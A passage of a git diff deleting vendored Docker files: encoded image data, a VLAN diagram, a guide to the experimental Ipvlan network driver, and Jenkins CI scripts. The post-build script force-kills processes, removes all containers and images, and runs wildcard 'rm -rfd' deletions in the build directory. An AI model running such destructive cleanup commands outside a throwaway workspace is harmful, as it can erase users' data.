z;$qu%QYitu3SssX_7~!el5(k0Tva%bmhFg;jLqJ(9h)P>o>hn~7>Zz|d}Lqw*s)PY z;XvGW(g6mkdcCgjG_$&@$i_uQ$k@bCcxN`n!wvLs`;p?Zw|3*=%56gryv(i&)Rqy- ztX2dH{K&BR_G$<|6CT*HUBTrMLlqIjju1y&q4c;|&y@QY_4qhLzygt7>^!RQvW#%% zQANfa8S7#Ofh|NGT(C)FdsQKhLNX}@R-(NcQ5Zl?Kpznfrd+QG*eF(P*-6QWL+#l* zm|V5pjLQQ&!bU*CuFJCQI_}L+>X=dtxZ%cL*;tF=gX12;$$K>cF#>mrp~J*6MIaTA zvKAT`W>j(@VFba9&CELigpFxa3Wg|+1yI6AFvj#^n>cpIw3+b{CNzcx4URR)gqMgS zjwcEH*Z^+nfk@kCB;r^yu@LK{v9XC89Mj1x(8MSuD1nY)hz(;H7^~rtV+2U}M4dqc z5jG8;Ppp9L__}#S6BFg*zaF}|+DW|f2~IK$>KHr#8H2~d8j$>@>2sinm8hz60QGx_7jT8T@< zWKd#xN+ul+k+>uUIycOa>13x@GBQFt;>bK1OT`b|2$Ud@u>#4+EEvLcehKG~hU2sX zaUiGGSQppbM0wi$p+ChofsPOnfW8(rcG8p)y{2q1pi`15OlhV;t_3)8FakJ<0K(VZ zu;~&c$RxwZ=>-l5EC(VP0Z2oD4=fG^-pvC-SPmv%9V~}&l9d=}Rv?IT)tL41ND5)Q zf?^ep#}@%*=?vo-+kFm;h2s$6Nor5NY?$F#4hC`aWrTUu?(YKV)BM>2|AXElX-UBI%fzz(P&?7DWH+{zAk0^+=^q=csanP&hp zwqk25VJ4N55wcg~mj{7`#R1cXttgNQFl1u}PO!nIOE?60!dB_6{Pnj*7h!oUN*`FV z(=dGshA_^g>h!@bwqugQrtFf|a<^y`%qC5pi#oq3^%;{8&aegK3gDDDDdMon8O6FS z6JnGsp*&!27?YsF4?VHHcG;3%5eUy+DSL@qrRLgmYFZQ^spgy z%)yt|8@*D57t@ZE$9F&`LU>Vyk$gB`L4zdY_(1x^z&^N@a6l^#GBk7KrKj@`^SndMF2GD|415J;%g(X9f+ca~j=ESFPuWv`SV8N9C5Z0b!(@ z9Wc#~x&f5q2tNBE#SV~*PoL2n2LvzZQFB#E^y5zb-3LU7aj#xX56)m6^7EH19fG=Uh0S!ZG^EQ9U%U=#p3<<|dO$cjrxMiK z>b@R`KW*H%`1WvJg|*X$c6qmGMF=vaFE*b4zCzAA6%F2zoqX`gN<9M36Fm^iCF|>F;I~fLlr}g*nkU_M_PN-w%3f(45Iuqn z+MqZ6cj`ROSyX&c>x(bub_U|T1M%qD*`LYGkj`A5?L=Sg_&Dd)f0-4}m+gedN-{rcU8mvc7XRC+xSh?HccMd8{Jpo% zYFiMHLN{D|jZZ$DOJ247^>-Wuqgd8n-yQI1Vv5lLqH(g-uMVT(ft>%S96*g6yKnqzZG-kLnxIz2b*^wAi%5C z%)D2P5c+aYl@4%I`i@d@ea$Lod$iOmtYs$|5{U)#8NKNq!s^LzSUr3b7S#O%dJjqv z&(2n-=$*MYm05X~>_b;-^mT>3}DA@$=$t9FT9%J->Os^yg4a4`$40 z5i+DtYbD)pl`5FN-o?2cMe{L_&(;Rb@}Te;fBbATo(^zajcIDZ(ux7KG02cSS}3)3 z5T$dLklD1Ny@z56G9+BA&JJ#MWUWsh+=Hw_Tx%HuvhjP5oOdce2_H?RI>-%L+ACHh z`_R&sw~V8=7kTdI@5IgJ^24SUXGn*Z15vBgRJ`bgh|osXWOdoMwqlpeAO*H&-h2ZUgz$7-dKKcP z4z6_RQWOh&TMZR`DX9>Ug|$@iDGU#8^b_tn1SEciwr!sMVni|m64=KOpv$O?Eepx0 zz++hvsI15WZ@2;@P<#%F6|e)^29tLMf?URfO+AnWjAU1kc|j%^cpR2NMkcb$6Ov(W z44GtH0RRBOtYPLLwvLV1499FDLynL7g6)pLH5)^YjWFmS3GfIw%P20#MA;!h23H6% zn8;ujfGacW&|`B>U}wfZM`1w7n4oH~IRGQZ25_ARDQ6D?0yMZmBR8rBoO!;>>&k9p~*R9^rlY`hu8=1$p;28iH8sYDPUmM!e{(rC5pL;cFYDn z*1#TNMU)XE6R}7l8vEnO*iB-MFcHGV;$&imv;dDI<-lNT@UeyG1X$%)cCYFo!pe9``VxW|5_GAWXZHCAqhIxjC$9KOUX4J zOgdv?8k7+^k{byTOh$uap^4ei-*{;1o12J_`BOc(rXmPW&?L&&VNVzAI?Sm-)=p?{ z!u&tAvx!PvmAGytZl;!!YvOa-Pe_8OBIW*9EbMrTEGUr5^Hzux(A1|L7zLUFaV};$ zmMr*l2n?v@nKjw3*P-+n5Cc@D^DJU}z~t zJ1`0?4FT-iAr1f_2td)o#{F+>V$PyTF}xS4e~d(w-H&0(j3&$tSqIkk0iiCo-SqvCT7M#14aQe6999SUnert*{%Qp N002ovPDHLkV1f$s#LfT! diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg deleted file mode 100644 index 96cd21d52f..0000000000 --- a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg +++ /dev/null @@ -1 +0,0 @@ -DockerHost:Frontend,Backend &CreditCardAppTiersareIsolatedbutcanstillcommunicateinsideinterfaceoranyotherDockerhostsusingtheparentVLANID802.1QTrunk -canbeasingleEthernetlinkorMultipleBondedEthernetlinksInterfaceeth0Container(s)Eth010.1.20.0/24Parent:eth0.20VLANID:20CreditCardsBackendContainer(s)Eth010.1.30.0/24Container(s)Eth010.1.10.0/24FrontendGateway10.1.20.1andothercontainersonthesameVLAN/subnetGateway10.1.10.1andothercontainersonthesameVLAN/subnetGateway10.1.30.1andothercontainersonthesameVLAN/subnet:Parenteth0.10VLANID:10Parent:eth0.30VLAN:30NetworkotherDockerHosts \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/vlan-networks.md b/vendor/github.com/docker/docker/experimental/vlan-networks.md deleted file mode 100644 index caec6d6c6b..0000000000 --- a/vendor/github.com/docker/docker/experimental/vlan-networks.md +++ /dev/null @@ -1,471 +0,0 @@ -# Ipvlan Network Driver - -### Getting Started - -The Ipvlan driver is currently in experimental mode in order to incubate Docker users use cases and vet the implementation to ensure a hardened, production ready driver in a future release. Libnetwork now gives users total control over both IPv4 and IPv6 addressing. The VLAN driver builds on top of that in giving operators complete control of layer 2 VLAN tagging and even Ipvlan L3 routing for users interested in underlay network integration. For overlay deployments that abstract away physical constraints see the [multi-host overlay ](https://docs.docker.com/engine/userguide/networking/get-started-overlay/) driver. - -Ipvlan is a new twist on the tried and true network virtualization technique. The Linux implementations are extremely lightweight because rather than using the traditional Linux bridge for isolation, they are simply associated to a Linux Ethernet interface or sub-interface to enforce separation between networks and connectivity to the physical network. - -Ipvlan offers a number of unique features and plenty of room for further innovations with the various modes. Two high level advantages of these approaches are, the positive performance implications of bypassing the Linux bridge and the simplicity of having less moving parts. Removing the bridge that traditionally resides in between the Docker host NIC and container interface leaves a very simple setup consisting of container interfaces, attached directly to the Docker host interface. This result is easy access for external facing services as there is no port mappings in these scenarios. - -### Pre-Requisites - -- The examples on this page are all single host and setup using Docker experimental builds that can be installed with the following instructions: [Install Docker experimental](https://github.com/docker/docker/tree/master/experimental) - -- All of the examples can be performed on a single host running Docker. Any examples using a sub-interface like `eth0.10` can be replaced with `eth0` or any other valid parent interface on the Docker host. Sub-interfaces with a `.` are created on the fly. `-o parent` interfaces can also be left out of the `docker network create` all together and the driver will create a `dummy` interface that will enable local host connectivity to perform the examples. - -- Kernel requirements: - - - To check your current kernel version, use `uname -r` to display your kernel version - - Ipvlan Linux kernel v4.2+ (support for earlier kernels exists but is buggy) - -### Ipvlan L2 Mode Example Usage - -The ipvlan `L2` mode example is like the following image. The driver is specified with `-d driver_name` option. In this case `-d ipvlan`. - -![Simple Ipvlan L2 Mode Example](images/ipvlan_l2_simple.png) - -The parent interface in the next example `-o parent=eth0` is configured as followed: - -``` -ip addr show eth0 -3: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 - inet 192.168.1.250/24 brd 192.168.1.255 scope global eth0 -``` - -Use the network from the host's interface as the `--subnet` in the `docker network create`. The container will be attached to the same network as the host interface as set via the `-o parent=` option. - -Create the ipvlan network and run a container attaching to it: - -``` -# Ipvlan (-o ipvlan_mode= Defaults to L2 mode if not specified) -docker network create -d ipvlan \ - --subnet=192.168.1.0/24 \ - --gateway=192.168.1.1 \ - -o ipvlan_mode=l2 \ - -o parent=eth0 db_net - -# Start a container on the db_net network -docker run --net=db_net -it --rm alpine /bin/sh - -# NOTE: the containers can NOT ping the underlying host interfaces as -# they are intentionally filtered by Linux for additional isolation. -``` - -The default mode for Ipvlan is `l2`. If `-o ipvlan_mode=` are left unspecified, the default mode will be used. Similarly, if the `--gateway` is left empty, the first usable address on the network will be set as the gateway. For example, if the subnet provided in the network create is `--subnet=192.168.1.0/24` then the gateway the container receives is `192.168.1.1`. - -To help understand how this mode interacts with other hosts, the following figure shows the same layer 2 segment between two Docker hosts that applies to and Ipvlan L2 mode. - -![Multiple Ipvlan Hosts](images/macvlan-bridge-ipvlan-l2.png) - -The following will create the exact same network as the network `db_net` created prior, with the driver defaults for `--gateway=192.168.1.1` and `-o ipvlan_mode=l2`. - -``` -# Ipvlan (-o ipvlan_mode= Defaults to L2 mode if not specified) -docker network create -d ipvlan \ - --subnet=192.168.1.0/24 \ - -o parent=eth0 db_net_ipv - -# Start a container with an explicit name in daemon mode -docker run --net=db_net_ipv --name=ipv1 -itd alpine /bin/sh - -# Start a second container and ping using the container name -# to see the docker included name resolution functionality -docker run --net=db_net_ipv --name=ipv2 -it --rm alpine /bin/sh -ping -c 4 ipv1 - -# NOTE: the containers can NOT ping the underlying host interfaces as -# they are intentionally filtered by Linux for additional isolation. -``` - -The drivers also support the `--internal` flag that will completely isolate containers on a network from any communications external to that network. Since network isolation is tightly coupled to the network's parent interface the result of leaving the `-o parent=` option off of a network create is the exact same as the `--internal` option. If the parent interface is not specified or the `--internal` flag is used, a netlink type `dummy` parent interface is created for the user and used as the parent interface effectively isolating the network completely. - -The following two `docker network create` examples result in identical networks that you can attach container to: - -``` -# Empty '-o parent=' creates an isolated network -docker network create -d ipvlan \ - --subnet=192.168.10.0/24 isolated1 - -# Explicit '--internal' flag is the same: -docker network create -d ipvlan \ - --subnet=192.168.11.0/24 --internal isolated2 - -# Even the '--subnet=' can be left empty and the default -# IPAM subnet of 172.18.0.0/16 will be assigned -docker network create -d ipvlan isolated3 - -docker run --net=isolated1 --name=cid1 -it --rm alpine /bin/sh -docker run --net=isolated2 --name=cid2 -it --rm alpine /bin/sh -docker run --net=isolated3 --name=cid3 -it --rm alpine /bin/sh - -# To attach to any use `docker exec` and start a shell -docker exec -it cid1 /bin/sh -docker exec -it cid2 /bin/sh -docker exec -it cid3 /bin/sh -``` - -### Ipvlan 802.1q Trunk L2 Mode Example Usage - -Architecturally, Ipvlan L2 mode trunking is the same as Macvlan with regard to gateways and L2 path isolation. There are nuances that can be advantageous for CAM table pressure in ToR switches, one MAC per port and MAC exhaustion on a host's parent NIC to name a few. The 802.1q trunk scenario looks the same. Both modes adhere to tagging standards and have seamless integration with the physical network for underlay integration and hardware vendor plugin integrations. - -Hosts on the same VLAN are typically on the same subnet and almost always are grouped together based on their security policy. In most scenarios, a multi-tier application is tiered into different subnets because the security profile of each process requires some form of isolation. For example, hosting your credit card processing on the same virtual network as the frontend webserver would be a regulatory compliance issue, along with circumventing the long standing best practice of layered defense in depth architectures. VLANs or the equivocal VNI (Virtual Network Identifier) when using the Overlay driver, are the first step in isolating tenant traffic. - -![Docker VLANs in Depth](images/vlans-deeper-look.png) - -The Linux sub-interface tagged with a vlan can either already exist or will be created when you call a `docker network create`. `docker network rm` will delete the sub-interface. Parent interfaces such as `eth0` are not deleted, only sub-interfaces with a netlink parent index > 0. - -For the driver to add/delete the vlan sub-interfaces the format needs to be `interface_name.vlan_tag`. Other sub-interface naming can be used as the specified parent, but the link will not be deleted automatically when `docker network rm` is invoked. - -The option to use either existing parent vlan sub-interfaces or let Docker manage them enables the user to either completely manage the Linux interfaces and networking or let Docker create and delete the Vlan parent sub-interfaces (netlink `ip link`) with no effort from the user. - -For example: `eth0.10` to denote a sub-interface of `eth0` tagged with vlan id `10`. The equivalent `ip link` command would be `ip link add link eth0 name eth0.10 type vlan id 10`. - -The example creates the vlan tagged networks and then start two containers to test connectivity between containers. Different Vlans cannot ping one another without a router routing between the two networks. The default namespace is not reachable per ipvlan design in order to isolate container namespaces from the underlying host. - -**Vlan ID 20** - -In the first network tagged and isolated by the Docker host, `eth0.20` is the parent interface tagged with vlan id `20` specified with `-o parent=eth0.20`. Other naming formats can be used, but the links need to be added and deleted manually using `ip link` or Linux configuration files. As long as the `-o parent` exists anything can be used if compliant with Linux netlink. - -``` -# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged -docker network create -d ipvlan \ - --subnet=192.168.20.0/24 \ - --gateway=192.168.20.1 \ - -o parent=eth0.20 ipvlan20 - -# in two separate terminals, start a Docker container and the containers can now ping one another. -docker run --net=ipvlan20 -it --name ivlan_test1 --rm alpine /bin/sh -docker run --net=ipvlan20 -it --name ivlan_test2 --rm alpine /bin/sh -``` - -**Vlan ID 30** - -In the second network, tagged and isolated by the Docker host, `eth0.30` is the parent interface tagged with vlan id `30` specified with `-o parent=eth0.30`. The `ipvlan_mode=` defaults to l2 mode `ipvlan_mode=l2`. It can also be explicitly set with the same result as shown in the next example. - -``` -# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged. -docker network create -d ipvlan \ - --subnet=192.168.30.0/24 \ - --gateway=192.168.30.1 \ - -o parent=eth0.30 \ - -o ipvlan_mode=l2 ipvlan30 - -# in two separate terminals, start a Docker container and the containers can now ping one another. -docker run --net=ipvlan30 -it --name ivlan_test3 --rm alpine /bin/sh -docker run --net=ipvlan30 -it --name ivlan_test4 --rm alpine /bin/sh -``` - -The gateway is set inside of the container as the default gateway. That gateway would typically be an external router on the network. - -``` -$ ip route - default via 192.168.30.1 dev eth0 - 192.168.30.0/24 dev eth0 src 192.168.30.2 -``` - -Example: Multi-Subnet Ipvlan L2 Mode starting two containers on the same subnet and pinging one another. In order for the `192.168.114.0/24` to reach `192.168.116.0/24` it requires an external router in L2 mode. L3 mode can route between subnets that share a common `-o parent=`. - -Secondary addresses on network routers are common as an address space becomes exhausted to add another secondary to a L3 vlan interface or commonly referred to as a "switched virtual interface" (SVI). - -``` -docker network create -d ipvlan \ - --subnet=192.168.114.0/24 --subnet=192.168.116.0/24 \ - --gateway=192.168.114.254 --gateway=192.168.116.254 \ - -o parent=eth0.114 \ - -o ipvlan_mode=l2 ipvlan114 - -docker run --net=ipvlan114 --ip=192.168.114.10 -it --rm alpine /bin/sh -docker run --net=ipvlan114 --ip=192.168.114.11 -it --rm alpine /bin/sh -``` - -A key takeaway is, operators have the ability to map their physical network into their virtual network for integrating containers into their environment with no operational overhauls required. NetOps simply drops an 802.1q trunk into the Docker host. That virtual link would be the `-o parent=` passed in the network creation. For untagged (non-VLAN) links, it is as simple as `-o parent=eth0` or for 802.1q trunks with VLAN IDs each network gets mapped to the corresponding VLAN/Subnet from the network. - -An example being, NetOps provides VLAN ID and the associated subnets for VLANs being passed on the Ethernet link to the Docker host server. Those values are simply plugged into the `docker network create` commands when provisioning the Docker networks. These are persistent configurations that are applied every time the Docker engine starts which alleviates having to manage often complex configuration files. The network interfaces can also be managed manually by being pre-created and docker networking will never modify them, simply use them as parent interfaces. Example mappings from NetOps to Docker network commands are as follows: - -- VLAN: 10, Subnet: 172.16.80.0/24, Gateway: 172.16.80.1 - - - `--subnet=172.16.80.0/24 --gateway=172.16.80.1 -o parent=eth0.10` - -- VLAN: 20, IP subnet: 172.16.50.0/22, Gateway: 172.16.50.1 - - - `--subnet=172.16.50.0/22 --gateway=172.16.50.1 -o parent=eth0.20 ` - -- VLAN: 30, Subnet: 10.1.100.0/16, Gateway: 10.1.100.1 - - - `--subnet=10.1.100.0/16 --gateway=10.1.100.1 -o parent=eth0.30` - -### IPVlan L3 Mode Example - -IPVlan will require routes to be distributed to each endpoint. The driver only builds the Ipvlan L3 mode port and attaches the container to the interface. Route distribution throughout a cluster is beyond the initial implementation of this single host scoped driver. In L3 mode, the Docker host is very similar to a router starting new networks in the container. They are on networks that the upstream network will not know about without route distribution. For those curious how Ipvlan L3 will fit into container networking see the following examples. - -![Docker Ipvlan L2 Mode](images/ipvlan-l3.png) - -Ipvlan L3 mode drops all broadcast and multicast traffic. This reason alone makes Ipvlan L3 mode a prime candidate for those looking for massive scale and predictable network integrations. It is predictable and in turn will lead to greater uptimes because there is no bridging involved. Bridging loops have been responsible for high profile outages that can be hard to pinpoint depending on the size of the failure domain. This is due to the cascading nature of BPDUs (Bridge Port Data Units) that are flooded throughout a broadcast domain (VLAN) to find and block topology loops. Eliminating bridging domains, or at the least, keeping them isolated to a pair of ToRs (top of rack switches) will reduce hard to troubleshoot bridging instabilities. Ipvlan L2 modes is well suited for isolated VLANs only trunked into a pair of ToRs that can provide a loop-free non-blocking fabric. The next step further is to route at the edge via Ipvlan L3 mode that reduces a failure domain to a local host only. - -- L3 mode needs to be on a separate subnet as the default namespace since it requires a netlink route in the default namespace pointing to the Ipvlan parent interface. - -- The parent interface used in this example is `eth0` and it is on the subnet `192.168.1.0/24`. Notice the `docker network` is **not** on the same subnet as `eth0`. - -- Unlike ipvlan l2 modes, different subnets/networks can ping one another as long as they share the same parent interface `-o parent=`. - -``` -ip a show eth0 -3: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 - link/ether 00:50:56:39:45:2e brd ff:ff:ff:ff:ff:ff - inet 192.168.1.250/24 brd 192.168.1.255 scope global eth0 -``` - --A traditional gateway doesn't mean much to an L3 mode Ipvlan interface since there is no broadcast traffic allowed. Because of that, the container default gateway simply point the the containers `eth0` device. See below for CLI output of `ip route` or `ip -6 route` from inside an L3 container for details. - -The mode ` -o ipvlan_mode=l3` must be explicitly specified since the default ipvlan mode is `l2`. - -The following example does not specify a parent interface. The network drivers will create a dummy type link for the user rather then rejecting the network creation and isolating containers from only communicating with one another. - -``` -# Create the Ipvlan L3 network -docker network create -d ipvlan \ - --subnet=192.168.214.0/24 \ - --subnet=10.1.214.0/24 \ - -o ipvlan_mode=l3 ipnet210 - -# Test 192.168.214.0/24 connectivity -docker run --net=ipnet210 --ip=192.168.214.10 -itd alpine /bin/sh -docker run --net=ipnet210 --ip=10.1.214.10 -itd alpine /bin/sh - -# Test L3 connectivity from 10.1.214.0/24 to 192.168.212.0/24 -docker run --net=ipnet210 --ip=192.168.214.9 -it --rm alpine ping -c 2 10.1.214.10 - -# Test L3 connectivity from 192.168.212.0/24 to 10.1.214.0/24 -docker run --net=ipnet210 --ip=10.1.214.9 -it --rm alpine ping -c 2 192.168.214.10 - -``` - -Notice there is no `--gateway=` option in the network create. The field is ignored if one is specified `l3` mode. Take a look at the container routing table from inside of the container: - -``` -# Inside an L3 mode container -$ ip route - default dev eth0 - 192.168.120.0/24 dev eth0 src 192.168.120.2 -``` - -In order to ping the containers from a remote Docker host or the container be able to ping a remote host, the remote host or the physical network in between need to have a route pointing to the host IP address of the container's Docker host eth interface. More on this as we evolve the Ipvlan `L3` story. - -### Dual Stack IPv4 IPv6 Ipvlan L2 Mode - -- Not only does Libnetwork give you complete control over IPv4 addressing, but it also gives you total control over IPv6 addressing as well as feature parity between the two address families. - -- The next example will start with IPv6 only. Start two containers on the same VLAN `139` and ping one another. Since the IPv4 subnet is not specified, the default IPAM will provision a default IPv4 subnet. That subnet is isolated unless the upstream network is explicitly routing it on VLAN `139`. - -``` -# Create a v6 network -docker network create -d ipvlan \ - --subnet=2001:db8:abc2::/64 --gateway=2001:db8:abc2::22 \ - -o parent=eth0.139 v6ipvlan139 - -# Start a container on the network -docker run --net=v6ipvlan139 -it --rm alpine /bin/sh - -``` - -View the container eth0 interface and v6 routing table: - -``` - eth0@if55: mtu 1500 qdisc noqueue state UNKNOWN group default - link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff - inet 172.18.0.2/16 scope global eth0 - valid_lft forever preferred_lft forever - inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link - valid_lft forever preferred_lft forever - inet6 2001:db8:abc2::1/64 scope link nodad - valid_lft forever preferred_lft forever - -root@5c1dc74b1daa:/# ip -6 route -2001:db8:abc4::/64 dev eth0 proto kernel metric 256 -2001:db8:abc2::/64 dev eth0 proto kernel metric 256 -default via 2001:db8:abc2::22 dev eth0 metric 1024 -``` - -Start a second container and ping the first container's v6 address. - -``` -$ docker run --net=v6ipvlan139 -it --rm alpine /bin/sh - -root@b817e42fcc54:/# ip a show eth0 -75: eth0@if55: mtu 1500 qdisc noqueue state UNKNOWN group default - link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff - inet 172.18.0.3/16 scope global eth0 - valid_lft forever preferred_lft forever - inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link tentative dadfailed - valid_lft forever preferred_lft forever - inet6 2001:db8:abc2::2/64 scope link nodad - valid_lft forever preferred_lft forever - -root@b817e42fcc54:/# ping6 2001:db8:abc2::1 -PING 2001:db8:abc2::1 (2001:db8:abc2::1): 56 data bytes -64 bytes from 2001:db8:abc2::1%eth0: icmp_seq=0 ttl=64 time=0.044 ms -64 bytes from 2001:db8:abc2::1%eth0: icmp_seq=1 ttl=64 time=0.058 ms - -2 packets transmitted, 2 packets received, 0% packet loss -round-trip min/avg/max/stddev = 0.044/0.051/0.058/0.000 ms -``` - -The next example with setup a dual stack IPv4/IPv6 network with an example VLAN ID of `140`. - -Next create a network with two IPv4 subnets and one IPv6 subnets, all of which have explicit gateways: - -``` -docker network create -d ipvlan \ - --subnet=192.168.140.0/24 --subnet=192.168.142.0/24 \ - --gateway=192.168.140.1 --gateway=192.168.142.1 \ - --subnet=2001:db8:abc9::/64 --gateway=2001:db8:abc9::22 \ - -o parent=eth0.140 \ - -o ipvlan_mode=l2 ipvlan140 -``` - -Start a container and view eth0 and both v4 & v6 routing tables: - -``` -docker run --net=v6ipvlan139 --ip6=2001:db8:abc2::51 -it --rm alpine /bin/sh - -root@3cce0d3575f3:/# ip a show eth0 -78: eth0@if77: mtu 1500 qdisc noqueue state UNKNOWN group default - link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff - inet 192.168.140.2/24 scope global eth0 - valid_lft forever preferred_lft forever - inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link - valid_lft forever preferred_lft forever - inet6 2001:db8:abc9::1/64 scope link nodad - valid_lft forever preferred_lft forever - -root@3cce0d3575f3:/# ip route -default via 192.168.140.1 dev eth0 -192.168.140.0/24 dev eth0 proto kernel scope link src 192.168.140.2 - -root@3cce0d3575f3:/# ip -6 route -2001:db8:abc4::/64 dev eth0 proto kernel metric 256 -2001:db8:abc9::/64 dev eth0 proto kernel metric 256 -default via 2001:db8:abc9::22 dev eth0 metric 1024 -``` - -Start a second container with a specific `--ip4` address and ping the first host using IPv4 packets: - -``` -docker run --net=ipvlan140 --ip=192.168.140.10 -it --rm alpine /bin/sh -``` - -**Note**: Different subnets on the same parent interface in Ipvlan `L2` mode cannot ping one another. That requires a router to proxy-arp the requests with a secondary subnet. However, Ipvlan `L3` will route the unicast traffic between disparate subnets as long as they share the same `-o parent` parent link. - -### Dual Stack IPv4 IPv6 Ipvlan L3 Mode - -**Example:** IpVlan L3 Mode Dual Stack IPv4/IPv6, Multi-Subnet w/ 802.1q Vlan Tag:118 - -As in all of the examples, a tagged VLAN interface does not have to be used. The sub-interfaces can be swapped with `eth0`, `eth1`, `bond0` or any other valid interface on the host other then the `lo` loopback. - -The primary difference you will see is that L3 mode does not create a default route with a next-hop but rather sets a default route pointing to `dev eth` only since ARP/Broadcasts/Multicast are all filtered by Linux as per the design. Since the parent interface is essentially acting as a router, the parent interface IP and subnet needs to be different from the container networks. That is the opposite of bridge and L2 modes, which need to be on the same subnet (broadcast domain) in order to forward broadcast and multicast packets. - -``` -# Create an IPv6+IPv4 Dual Stack Ipvlan L3 network -# Gateways for both v4 and v6 are set to a dev e.g. 'default dev eth0' -docker network create -d ipvlan \ - --subnet=192.168.110.0/24 \ - --subnet=192.168.112.0/24 \ - --subnet=2001:db8:abc6::/64 \ - -o parent=eth0 \ - -o ipvlan_mode=l3 ipnet110 - - -# Start a few of containers on the network (ipnet110) -# in separate terminals and check connectivity -docker run --net=ipnet110 -it --rm alpine /bin/sh -# Start a second container specifying the v6 address -docker run --net=ipnet110 --ip6=2001:db8:abc6::10 -it --rm alpine /bin/sh -# Start a third specifying the IPv4 address -docker run --net=ipnet110 --ip=192.168.112.50 -it --rm alpine /bin/sh -# Start a 4th specifying both the IPv4 and IPv6 addresses -docker run --net=ipnet110 --ip6=2001:db8:abc6::50 --ip=192.168.112.50 -it --rm alpine /bin/sh -``` - -Interface and routing table outputs are as follows: - -``` -root@3a368b2a982e:/# ip a show eth0 -63: eth0@if59: mtu 1500 qdisc noqueue state UNKNOWN group default - link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff - inet 192.168.112.2/24 scope global eth0 - valid_lft forever preferred_lft forever - inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link - valid_lft forever preferred_lft forever - inet6 2001:db8:abc6::10/64 scope link nodad - valid_lft forever preferred_lft forever - -# Note the default route is simply the eth device because ARPs are filtered. -root@3a368b2a982e:/# ip route - default dev eth0 scope link - 192.168.112.0/24 dev eth0 proto kernel scope link src 192.168.112.2 - -root@3a368b2a982e:/# ip -6 route -2001:db8:abc4::/64 dev eth0 proto kernel metric 256 -2001:db8:abc6::/64 dev eth0 proto kernel metric 256 -default dev eth0 metric 1024 -``` - -*Note:* There may be a bug when specifying `--ip6=` addresses when you delete a container with a specified v6 address and then start a new container with the same v6 address it throws the following like the address isn't properly being released to the v6 pool. It will fail to unmount the container and be left dead. - -``` -docker: Error response from daemon: Address already in use. -``` - -### Manually Creating 802.1q Links - -**Vlan ID 40** - -If a user does not want the driver to create the vlan sub-interface it simply needs to exist prior to the `docker network create`. If you have sub-interface naming that is not `interface.vlan_id` it is honored in the `-o parent=` option again as long as the interface exists and us up. - -Links if manually created can be named anything you want. As long as the exist when the network is created that is all that matters. Manually created links do not get deleted regardless of the name when the network is deleted with `docker network rm`. - -``` -# create a new sub-interface tied to dot1q vlan 40 -ip link add link eth0 name eth0.40 type vlan id 40 - -# enable the new sub-interface -ip link set eth0.40 up - -# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged -docker network create -d ipvlan \ - --subnet=192.168.40.0/24 \ - --gateway=192.168.40.1 \ - -o parent=eth0.40 ipvlan40 - -# in two separate terminals, start a Docker container and the containers can now ping one another. -docker run --net=ipvlan40 -it --name ivlan_test5 --rm alpine /bin/sh -docker run --net=ipvlan40 -it --name ivlan_test6 --rm alpine /bin/sh -``` - -**Example:** Vlan sub-interface manually created with any name: - -``` -# create a new sub interface tied to dot1q vlan 40 -ip link add link eth0 name foo type vlan id 40 - -# enable the new sub-interface -ip link set foo up - -# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged -docker network create -d ipvlan \ - --subnet=192.168.40.0/24 --gateway=192.168.40.1 \ - -o parent=foo ipvlan40 - -# in two separate terminals, start a Docker container and the containers can now ping one another. -docker run --net=ipvlan40 -it --name ivlan_test5 --rm alpine /bin/sh -docker run --net=ipvlan40 -it --name ivlan_test6 --rm alpine /bin/sh -``` - -Manually created links can be cleaned up with: - -``` -ip link del foo -``` - -As with all of the Libnetwork drivers, they can be mixed and matched, even as far as running 3rd party ecosystem drivers in parallel for maximum flexibility to the Docker user. diff --git a/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh b/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh deleted file mode 100644 index 662e2dcc37..0000000000 --- a/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh +++ /dev/null @@ -1,35 +0,0 @@ -set +x -set +e - -echo "" -echo "" -echo "---" -echo "Now starting POST-BUILD steps" -echo "---" -echo "" - -echo INFO: Pointing to $DOCKER_HOST - -if [ ! $(docker ps -aq | wc -l) -eq 0 ]; then - echo INFO: Removing containers... - ! docker rm -vf $(docker ps -aq) -fi - -# Remove all images which don't have docker or debian in the name -if [ ! $(docker images | sed -n '1!p' | grep -v 'docker' | grep -v 'debian' | awk '{ print $3 }' | wc -l) -eq 0 ]; then - echo INFO: Removing images... - ! docker rmi -f $(docker images | sed -n '1!p' | grep -v 'docker' | grep -v 'debian' | awk '{ print $3 }') -fi - -# Kill off any instances of git, go and docker, just in case -! taskkill -F -IM git.exe -T >& /dev/null -! taskkill -F -IM go.exe -T >& /dev/null -! taskkill -F -IM docker.exe -T >& /dev/null - -# Remove everything -! cd /c/jenkins/gopath/src/github.com/docker/docker -! rm -rfd * >& /dev/null -! rm -rfd .* >& /dev/null - -echo INFO: Cleanup complete -exit 0 \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh b/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh deleted file mode 100644 index 30e5884d97..0000000000 --- a/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh +++ /dev/null @@ -1,309 +0,0 @@ -# Jenkins CI script for Windows to Linux CI. -# Heavily modified by John Howard (@jhowardmsft) December 2015 to try to make it more reliable. -set +xe -SCRIPT_VER="Wed Apr 20 18:30:19 UTC 2016" - -# TODO to make (even) more resilient: -# - Wait for daemon to be running before executing docker commands -# - Check if jq is installed -# - Make sure bash is v4.3 or later. Can't do until all 